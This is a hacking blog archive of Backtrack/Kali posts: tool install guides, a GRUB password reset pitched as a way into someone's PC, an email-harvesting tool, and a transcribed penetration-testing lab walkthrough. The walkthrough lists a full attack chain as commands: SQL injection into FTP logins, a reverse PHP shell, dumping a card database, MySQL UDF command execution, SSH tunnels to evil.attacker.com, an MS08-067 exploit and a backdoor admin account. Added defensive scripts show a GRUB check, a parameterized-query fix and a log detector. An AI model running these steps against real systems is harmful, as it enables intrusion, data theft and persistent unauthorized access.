Showing posts with label Backtrack. Show all posts

[GUIDE] Installing Social Engineering Toolkit (S.E.T.) on Windows


How to Install?
  1. Download and extract S.E.T anywhere you want.
  2. Download and install the PyCrypto library that matches your Python version
  3. Done and you're ready to go! :)
How to Run the scripts?

  1. Open up your cmd and cd to the S.E.T directory
cd\
cd set

  2. Finally type in your cmd as below
python setoolkit
Downloads
Social Engineering Toolkit (40MB) / Mirror
PyCrypto
That's all and happy hacking :)

~ Sunday 2 November 2014 0 comments

[TRICKS] How to make your command prompt look like the Backtrack terminal



How to install?
  1. Download and extract the file
  2. Copy and paste it anywhere you like
  3. Run Console.exe. Enjoy :)
How to enable a transparent window?
  1. Go to Edit > Settings
  2. A new popup window appears; click on Appearance > More. Under the Window Transparency setting, click on Alpha, adjust the transparency rate, click OK, and you're good to go.
Downloads
Backtrack Terminal (1.6MB) / Mirror
Without watermark (recoded by K3RAMA7)
Backtrack Terminal 2 (1.6MB)

~ Thursday 23 October 2014 0 comments

How to Hack/Reset Kali linux login password


Recently changed your Kali Linux login password and forgotten it? Or maybe you want to hack someone's Kali Linux PC. I am giving you one foolproof solution for both issues. I really don't know why the Kali developers left this loophole behind; I also want to tell you that this works with Backtrack as well. So whether you have forgotten your Backtrack admin login password or your Kali Linux admin login password, just follow the instructions below.


1. First boot your Kali Linux and wait until the GRUB menu appears. When you see it, scroll down to the recovery mode entry and press E.

2. After pressing E you will see the boot entry editor. Here you have to change some words and add a line, as shown in the image.

3. After making the change, press F10 to boot.

4. After pressing F10 it will boot and you will see a shell prompt. Here type the command passwd root and hit enter.

5. Then type your new root password, hit enter, retype the password and hit enter again. After that you will see the message "password updated successfully".

6. Now power off by pressing your laptop/PC power button, switch it on again and log in with your new password.
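A defender's check to go with this, added here as an example and not part of the original post: the reset works because nothing stops someone at the console from pressing E and editing the boot entry. GRUB 2 refuses menu editing (and its command line) once grub.cfg names superusers and gives each of them a password entry, normally added through /etc/grub.d/40_custom. The Python script below reads a grub.cfg text and reports whether that protection is actually in place. The configuration samples are constructed for the demo, and the PBKDF2 hash is a placeholder rather than real grub-mkpasswd-pbkdf2 output.

```python
"""Check whether a grub.cfg locks console menu editing behind a password.

Added example, not from the original post. GRUB 2 only refuses edits when the
config names superusers AND each of them has a password entry. The sample
configs below are constructed; the PBKDF2 hash is a placeholder.
"""
import re

SUPERUSERS_RE = re.compile(r'^\s*set\s+superusers\s*=\s*"?([^"\s]+)"?', re.M)
PASSWORD_RE = re.compile(r'^\s*(password_pbkdf2|password)\s+(\S+)\s+(\S+)', re.M)


def grub_edit_protection(cfg_text):
    """Describe whether menu editing at the console is password-protected.

    Returns a dict with:
      protected  - True only if superusers are set and each one has a password
      superusers - names listed in 'set superusers'
      missing    - superusers without any password entry
      plaintext  - users whose secret uses the plain 'password' keyword
                   instead of 'password_pbkdf2'
    """
    match = SUPERUSERS_RE.search(cfg_text)
    superusers = [u for u in match.group(1).split(",") if u] if match else []
    stored = {}  # user -> keyword used for the password line
    for keyword, user, _secret in PASSWORD_RE.findall(cfg_text):
        stored[user] = keyword
    missing = [u for u in superusers if u not in stored]
    plaintext = sorted(u for u, kw in stored.items() if kw == "password")
    return {
        "protected": bool(superusers) and not missing,
        "superusers": superusers,
        "missing": missing,
        "plaintext": plaintext,
    }


# Constructed sample: the default layout, nothing stops editing the entry.
UNPROTECTED_CFG = """\
set timeout=5
menuentry 'Kali GNU/Linux' {
    linux /boot/vmlinuz root=/dev/sda1 ro
    initrd /boot/initrd.img
}
menuentry 'Kali GNU/Linux (recovery mode)' {
    linux /boot/vmlinuz root=/dev/sda1 ro single
    initrd /boot/initrd.img
}
"""

# Constructed sample of what /etc/grub.d/40_custom would add. The hash is a
# placeholder; a real one comes from grub-mkpasswd-pbkdf2.
PROTECTED_CFG = """\
set superusers="root"
password_pbkdf2 root grub.pbkdf2.sha512.10000.PLACEHOLDERSALT.PLACEHOLDERHASH
menuentry 'Kali GNU/Linux' --unrestricted {
    linux /boot/vmlinuz root=/dev/sda1 ro
    initrd /boot/initrd.img
}
menuentry 'Kali GNU/Linux (recovery mode)' {
    linux /boot/vmlinuz root=/dev/sda1 ro single
    initrd /boot/initrd.img
}
"""

# Constructed sample: superusers declared, but one has no password line and the
# other uses a plain-text password keyword.
HALF_DONE_CFG = 'set superusers="root,admin"\npassword root hunter2\n'

if __name__ == "__main__":
    for name, cfg in (("unprotected", UNPROTECTED_CFG),
                      ("protected", PROTECTED_CFG),
                      ("half-done", HALF_DONE_CFG)):
        print(name, grub_edit_protection(cfg))
```

Marking the normal entry --unrestricted keeps unattended reboots working while editing still asks for the password. This only raises the bar for someone at the console: booting from another disk or pulling the drive still works unless the firmware boot order is locked and the disk is encrypted, which is why the loophole mentioned above is really a question of who has physical access.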



~ Tuesday 11 June 2013 0 comments

Backtrack Reborn - Kali Linux

Vulnerability scanning and penetration testing tools are the weapons of hackers and information security experts; tools are a common requirement for both white hat and black hat hackers. So Linux distributions designed specially for penetration testing are very important from the point of view of both attacking and defending.

Backtrack is one of the most famous Linux distros and has all the necessary tools to conduct a successful attack on a victim network or computer. We were all expecting Backtrack 6, since after Backtrack 5 it had to be the next version, but the Offensive Security team decided to restructure the distribution, and hence Kali Linux has been released as Backtrack 6.

Kali Linux was released on March 13th 2013; according to the official announcement, Kali Linux is more stable and more secure. The official video gives an overview of the requirements and what to expect from this distro.

Download Backtrack 6 / Kali Linux

Kali Linux is available on the official website with a basic guide on installation and usage.

If you have used Kali Linux then kindly share your views about it. We will publish the Kali Linux installation guide later; the articles will cover:

How to install Kali Linux
Kali Linux dual-boot installation with Windows


Note: If you want to learn more about Linux and Windows based penetration testing, you might want to subscribe to our RSS feed and email subscription or become our Facebook fan! You will get all the latest updates at both places.

~ Saturday 23 March 2013 0 comments

BackTrack 5 R3 Released

Backtrack is one of the best Linux distributions for penetration testing; it helps ethical hackers perform penetration tests on networks, web applications, wireless networks, RFID and much more. Backtrack 5 was the last release, but now Backtrack 5 R3 has been released by the Backtrack community.

What the official website says about it:

The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

~ Tuesday 14 August 2012 0 comments

Backtrack 5 R2 Release - Update to Backtrack 5 R2

This post explains how to update and upgrade your current Backtrack 5 R1 machine to the latest version, Backtrack 5 R2. Backtrack 5 R2 will be released on 1 March, but the BT5 R2 kernel has already arrived, so you can update it yourself or wait for the official release. The new 3.2.6 kernel of BT5 R2 will provide a more stable and complete penetration testing environment than ever before.



Open the terminal and update your backtrack 5 R1 installation.


apt-get update
apt-get dist-upgrade
reboot

Now you have the latest kernel.

OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot
On the next reboot, you should see the red console splash screen appear.
Verify that you are running a 3.2.6 kernel:

uname -a
You should see something like “Linux bt 3.2.6 …”
Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

Add the new update repository and upgrade:


echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

You will be asked about the revision; keep the default (all) and hit enter.


Reboot your system so the updated services start.

Backtrack 5 R2 will be officially released on 1 March with the complete information.
Source


~ Saturday 25 February 2012 0 comments

How to Install Wordpress on Localhost Linux Backtrack 5

WordPress is a wonderful and user-friendly CMS (content management system); many blogs nowadays use WordPress software for their blogging. Although other CMS software is available, WordPress has its own importance due to its amazing features. This article is not about the advantages of WordPress over other CMSs like Joomla; its main aim is to demonstrate how to install WordPress on your Linux machine, whether on localhost or on a remote web server.

You can install WordPress on your local computer, but why install WordPress on localhost? The answer is simple: penetration testing / ethical hacking requires practice, so install WordPress on your computer to practise WordPress hacking. After installation you can test different WordPress vulnerability scanners and try different plugins too.

The method to install WordPress on Windows is different from Linux but easy: all you need to do is download a XAMPP setup, because it contains the Apache and SQL software. In Backtrack 5 R1 (based on Ubuntu) we have Apache and MySQL by default. So follow these steps to install WordPress on your Linux machine.

  • Download the WordPress software
  • Extract it in the www folder (go to the file system, then var, then www); it is good to make a separate folder for WordPress.
  • Now start Apache and MySQL (Applications → Backtrack → Services → HTTPD → MYSQLD)
  • You need to create a database for WordPress; open a terminal and type:


root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE DATABASE name;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON name.* TO "username"@"localhost"
    -> IDENTIFIED BY "passwordhere";
Query OK, 0 rows affected (0.00 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)

mysql> EXIT
Bye
root@bt:~#

  • Now open your localhost in the browser; in my case http://127.0.0.1/wordpress
  • On the database settings panel enter:

Database Name: wordpress (or whichever database you created)
User Name: username (entered in the MySQL setup)
Password: passwordhere
Database Host: localhost
Table Prefix: wp_

  • On the next screen copy the config code shown, create a new file, paste it and save it in the same directory with the name wp-config.php
  • Then click on Install
  • Reopen the browser and create an admin account.
  • That's it.

You can open your new wordpress http://127.0.0.1/wordpress



~ Sunday 5 February 2012 0 comments

Arachni Web Application Security Scanner Framework Tutorial

Web application hacking is very common, and there are many tools that can exploit web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The very first step is to find the vulnerabilities in the web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed at helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install Arachni and how to launch your first attack against a web application.

Download Arachni

I am on Backtrack 5 R1, but you can use another Linux distribution such as Ubuntu. Start the web interface of Arachni:

root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web

Next you need to start a Dispatcher, because Arachni cannot run scans without one:

root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd
Now click on Plugins to choose the plugins you want, then click on Modules to select or deselect modules depending on your needs.
Now click on Start Scan, enter the URL of the target web application and start the scan; after some time, review the report to see the vulnerabilities found.

~ Sunday 22 January 2012 0 comments

Penetration Testing in the Real World Offensive Security Video Tutorial

Hacking, cracking and penetration testing are the hot topics of this blog, and we have discussed different tutorials based on Backtrack Linux, especially Backtrack 5 R1 because it is the newest one. However, there are many video tutorials for Backtrack Linux that were made on previous versions such as Backtrack 4. The main aim and idea is the same: to educate people on how to do a penetration test.

I think there is no need to introduce Offensive Security. I was searching on the Internet and found a wonderful video tutorial made by the Offensive Security team.

This video will teach you about remote penetration testing and how to enumerate and map the internal network behind a web server (database, SMS and other servers). Although this video was created on a previous version of Backtrack, it applies to Backtrack 5 R1 because the tools are the same.



Commands & Tools Discussed in the Video

ftp-brute.py


#!/usr/bin/python
from ftplib import FTP

print("Attempting user directory discovery via FTP")
for i in range(0, 6):
    # The LIMIT offset selects a different ftpuser row on each login attempt
    username = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT " + str(i) + ",1; -- "
    password = str("1")
    ftp = FTP('www.offseclabs.com')
    ftp.login(username, password)
    print("Logged in as user " + str(i) + ",1")
    ftp.retrlines('LIST')
    ftp.close()
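To show why that script logs in at all, here is an added example (not code from the video, the post, or Offensive Security) that rebuilds the user lookup the lab FTP server must be doing and puts the fixed version next to it. Only the payload and the table name ftpuser come from the walkthrough; the column list, the string-built query, and the assumption that the server compares the fetched passwd column with the supplied password afterwards (which is why the payload selects the literal 1 as passwd and logs in with password 1) are guesses about the lab server, made so the payload behaves as described. The accounts are constructed and live in an in-memory SQLite database, so nothing here touches a network.

```python
"""Why the injected username in ftp-brute.py logs in, and the fix.

Added example, not code from the video or the post. Table columns, the
string-built query and the "compare passwd afterwards" logic are assumptions
about the lab server; the accounts are constructed and kept in SQLite memory.
"""
import sqlite3

# Constructed accounts. One maps to the web root with uid 0, which is the row
# the walkthrough's loop over LIMIT offsets is hunting for.
SAMPLE_USERS = [
    ("bob",   "bob",    1001, 1001, "/home/bob",   "/bin/sh"),
    ("alice", "s3cr3t", 1002, 1002, "/home/alice", "/bin/sh"),
    ("carol", "pw3",    1003, 1003, "/home/carol", "/bin/sh"),
    ("dave",  "pw4",    1004, 1004, "/home/dave",  "/bin/sh"),
    ("erin",  "pw5",    1005, 1005, "/home/erin",  "/bin/sh"),
    ("www",   "x9y8z7", 0,    0,    "/var/www",    "/bin/false"),
]

# The username from the walkthrough; {n} is the LIMIT offset ftp-brute.py loops over.
INJECTED_USERNAME = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell "
                     "from ftpuser LIMIT {n},1; -- ")


def make_db():
    """In-memory table shaped like the one the payload reads from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ftpuser (userid TEXT, passwd TEXT, uid INTEGER, "
                 "gid INTEGER, homedir TEXT, shell TEXT)")
    conn.executemany("INSERT INTO ftpuser VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def _check_row(row, password):
    """Assumed application logic: accept if the fetched passwd equals the input."""
    if row is not None and str(row[1]) == password:
        return {"uid": row[2], "gid": row[3], "homedir": row[4]}
    return None


def vulnerable_login(conn, username, password):
    """The username is pasted into the SQL text, so it can close the quote and
    append its own UNION SELECT (assumed lab-server behaviour)."""
    sql = ("SELECT userid, passwd, uid, gid, homedir, shell FROM ftpuser "
           "WHERE (userid='%s')" % username)
    return _check_row(conn.execute(sql).fetchone(), password)


def safe_login(conn, username, password):
    """Same lookup with a bound parameter: the username is only ever data."""
    sql = ("SELECT userid, passwd, uid, gid, homedir, shell FROM ftpuser "
           "WHERE userid = ?")
    return _check_row(conn.execute(sql, (username,)).fetchone(), password)


def homedirs_exposed(conn, login, offsets=range(6)):
    """Run the walkthrough's LIMIT loop against a login function and return
    the home directories it reveals; with the fixed query the set is empty."""
    exposed = set()
    for n in offsets:
        result = login(conn, INJECTED_USERNAME.format(n=n), "1")
        if result is not None:
            exposed.add(result["homedir"])
    return exposed


def exposure_report():
    """Compare what the two implementations leak to the same loop."""
    db = make_db()
    return {
        "vulnerable": sorted(homedirs_exposed(db, vulnerable_login)),
        "fixed": sorted(homedirs_exposed(db, safe_login)),
    }


if __name__ == "__main__":
    for label, dirs in exposure_report().items():
        print(label, dirs)
```

The loop in homedirs_exposed mirrors the LIMIT walk in ftp-brute.py: against vulnerable_login it returns every home directory in the table, against safe_login nothing, because a bound parameter is compared as a string and never parsed as SQL. In an FTP server log the same attack shows up as login names containing quotes, union select or a trailing -- comment, which is an easy thing to alert on.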

Open Terminal A : 


nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell) Download reverse PHP shell
-----------------------
Open Terminal B :
nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------
Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php --> (file upload php file)
-------------------------
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and mark it as 1)
(upload rs [a binary reverse shell] and mark it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)
---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get a reverse shell at Terminal D)
----------------------------
Open Terminal E :
nc -lvp 80
----------------------------
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)
---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------
Open Terminal F :
netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
-----------------------------
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add
---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)
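From the defender's side, the MySQL part of this walkthrough is the most detectable step, and the following added example (not from the post or the video) shows how to pick it out of a MySQL general query log. The three statements that turn a database login into command execution, SELECT ... INTO DUMPFILE writing an uploaded blob into the plugin directory, CREATE FUNCTION ... SONAME loading it, and a call to a sys_* function, practically never occur in application traffic. The log lines below are constructed in a timestamp / thread id / command / argument layout like the general_log table; they are not real server output, and the host address is taken from the walkthrough only as a sample value.

```python
"""Flag the MySQL UDF chain from the walkthrough in a general query log.

Added example, not part of the post. The log is constructed for the demo in a
general_log-like layout: timestamp, thread id, command, argument.
"""
import re
from collections import defaultdict

# One rule per step of the chain; matched case-insensitively.
RULES = {
    "file_write":  re.compile(r"\bINTO\s+(?:DUMP|OUT)FILE\b", re.I),
    "so_in_path":  re.compile(r"(?:DUMP|OUT)FILE\s+'[^']*\.so'", re.I),
    "udf_create":  re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I),
    "sys_udf_use": re.compile(r"\bsys_(?:exec|eval|set|get)\s*\(", re.I),
}
# A thread that does all three of these has completed the chain.
CHAIN = ("file_write", "udf_create", "sys_udf_use")

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<thread>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$")

# Constructed log: thread 12 is the walkthrough, 13 is normal traffic,
# 14 is a plain CSV export that should not be reported as the full chain.
SAMPLE_LOG = """\
2012-01-11T10:00:01Z 12 Connect root@10.150.0.5 on pwn
2012-01-11T10:00:02Z 12 Query use pwn
2012-01-11T10:00:03Z 12 Query SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so'
2012-01-11T10:00:04Z 12 Query CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so'
2012-01-11T10:00:05Z 12 Query SELECT sys_eval('id')
2012-01-11T10:00:06Z 13 Query SELECT * FROM products WHERE id = 42
2012-01-11T10:00:07Z 14 Query SELECT name INTO OUTFILE '/tmp/report.csv' FROM products
2012-01-11T10:00:08Z 12 Quit
"""


def parse_general_log(text):
    """Yield (thread, statement) for each well-formed Query line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and m.group("cmd") == "Query":
            yield m.group("thread"), m.group("arg")


def scan_general_log(text):
    """Return {thread: {rule: [statement, ...]}} for statements matching any rule."""
    hits = defaultdict(lambda: defaultdict(list))
    for thread, stmt in parse_general_log(text):
        for name, rx in RULES.items():
            if rx.search(stmt):
                hits[thread][name].append(stmt)
    return {thread: dict(rules) for thread, rules in hits.items()}


def threads_completing_chain(text):
    """Threads that wrote a file, loaded a UDF from a shared object, and
    called a sys_* function; a lone INTO OUTFILE is only a single hit."""
    hits = scan_general_log(text)
    return sorted(t for t, rules in hits.items()
                  if all(step in rules for step in CHAIN))


if __name__ == "__main__":
    for thread, rules in scan_general_log(SAMPLE_LOG).items():
        print(thread, sorted(rules))
    print("full chain:", threads_completing_chain(SAMPLE_LOG))
```

A single INTO OUTFILE can be a legitimate export, so threads_completing_chain only reports a connection that performs all three steps, while scan_general_log keeps the per-rule hits for triage. The real fix sits upstream of detection: the web application's database account should not be root, should not hold the FILE privilege, and secure_file_priv should keep any file write away from the plugin directory.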

~ Wednesday 11 January 2012 0 comments

UberHarvest - Email & Domain Harvesting Multi Purpose Tool

This FREE tool was designed to let a user enter an individual website or load a text file containing many URLs at once. Once the URL(s) have been entered, the uberharvest application crawls through the website (and all the links within that website) searching for valid email addresses. The application can search for email addresses randomly (i.e. something@domain.something) or the user can choose to search for email addresses of a specific domain (i.e. for www.ubersec.com the application can search for all @ubersec.com email addresses within the website).

Then the user can choose to either print the results on the screen, save them to a text file, or write them to an XML file with an XSL stylesheet. In addition, the application can also search for the Mail Exchange (MX) server Internet Protocol (IP) addresses corresponding to each URL that uberharvest has found, and that information can then be used by uberharvest to test whether the MX server is an open relay. The uberharvest application also gives the user the option to use a random user-agent when crawling each link and to perform the scans through anonymous proxy servers.


Requirements



The uberharvest tool was written in Python. It requires Python version 2.52 or higher to work properly. If you are using Ubuntu/Backtrack and your Python version is lower than the supported 2.52, please refer to my blog for instructions on downloading and switching to a newer version of Python.

Uberharvest also requires the user to manually download and install Network Mapper (NMAP) from http://www.insecure.org


Uberharvest Features



Harvest for email addresses from one website or many at once

Get target website domain name, domain IP and Geo location

Scan target website for Mail Exchange (MX) servers IP address.

Test whether the target MX servers are open-relay server

Get the target web server version and x-powered-by from the header

Harvest information using evasion techniques through the use of anonymous proxy and different user-agents.

Get target server domains from Google search engine

Use the UP ARROW to reuse old input to increase time efficiency

Print out results in XML format and XSL style-sheet.


Disclaimer



This tool was created by Yakov Goldberg for legal penetration testing purposes only. The tool is FREE of charge and must only be used for helping society and improving upon cyber security. That tool (uberharvest) was created to automate and make the life of security professionals a little easier. Thus, this tool MUST NOT be used to harm any entity or cause any damage. Yakov Goldberg does not claim any responsibility for any information that is retrieved by using this tool and any further reckless or intentional malicious or non-malicious attacks that someone might or may attempt to do by using the information gathered from this tool.


Operating System(s) compatibility



The uberharvest tool was written in Python and is currently compatible with newer Ubuntu/Backtrack releases. However, users of all other Linux distributions may try the Uberharvest application as well. The instructions below are for Ubuntu only, so non-Ubuntu users may need to refer to other websites for instructions on installing the modules and prerequisites required for the uberharvest tool. Uberharvest has been tested on the following Ubuntu/Backtrack distributions:


Distributor ID: Ubuntu
Description: Ubuntu 10.04.2 LTS
Release: 10.04
Codename: lucid

Distributor ID: Ubuntu
Description: Ubuntu 10.10
Release: 10.10
Codename: maverick

Distributor ID: BackTrack
Description: BackTrack 4 R2
Release: 4 R2
Codename: Nemesis

Distributor ID: Ubuntu
Description: Ubuntu 11.10
Release: 11.10
Codename: oneiric

Distributor ID: BackTrack 5

Download and installation process



ehacking@ubuntu:~ $su -
ehacking@ubuntu:~ #wget http://ubersec.com/downloads/uberharvest_2_80.tar.bz2
ehacking@ubuntu:~ #md5sum uberharvest_2_80.tar.bz2
Now compare the md5sum value with the value posted in www.ubersec.com/downloads
ehacking@ubuntu:~ #bzip2 -cd uberharvest_2_80.tar.bz2 | tar xvf -
ehacking@ubuntu:~ #cd
ehacking@ubuntu:~/uberharvest#./setup

EXAMPLE 1


The [-m] flag loads the uberharvest tool and asks the user to type the URL of one website he or she is interested in harvesting email addresses from.


ehacking@ubuntu:~/uberharvest#./uberharvest -m

STEPS:

Now you will be required to type a full website address that you would like to scan
Please enter a valid web address. For example, http://www.ubersec.com

Please enter the address: http://www.ubersec.com

I typed this full URL http://www.ubersec.com for scanning this website

QUESTION 1
Would you like to search for a specific email address domain? For example, @ubersec.com

[Y]es – The user will specify a domain name (i.e. ubersec.com)
[N]o – The tool will search for any email address (i.e. @ .)

Please type Y or N: n

If you select [y], you will have to specify a domain name such as ubersec.com or @ubersec.com.
In that case, uberharvest will search through the website and harvest all emails that match the @ubersec.com criterion.
If you select [n], the uberharvest tool will search through the target website and harvest all emails (i.e. @ .)

QUESTION 2

Would you like to save output to a text file?

[Y]es – The output will be saved to a file
[N]o – The output will be displayed on the screen

Please type Y or N: n

If you select [n], the output will be displayed on the screen only.
If you select [y], the results will be saved to a file in the [vault/] folder.

QUESTION 3

Would you like to search only for URLs that are specific for the website that you are interested?

HINT,

For example, if your website is http://www.ubersec.com if you say [Y], uberharvest will only search for emails within links that belong to ubersec.com rather than jumping to other websites.

[Y]es – Uberharvest will only search for emails in links that belong to that website (i.e. ubersec.com)
[N]o – Uberharvest will search for emails also in other links that are referenced in the website.

Please type Y or N:n

If you select [n], the uberharvest tool will search through the www.ubersec.com website, collect all other links mentioned on the ubersec website, and finally search within those links for all other email addresses.
If you select [y], the uberharvest tool will search through the www.ubersec.com website, collect only the links that belong to ubersec.com, and finally search within those links for all other email addresses.

Press [Enter] and off we go…

THE RESULTS ARE



More tutorials and updates can be found Here.




~ Sunday 8 January 2012 0 comments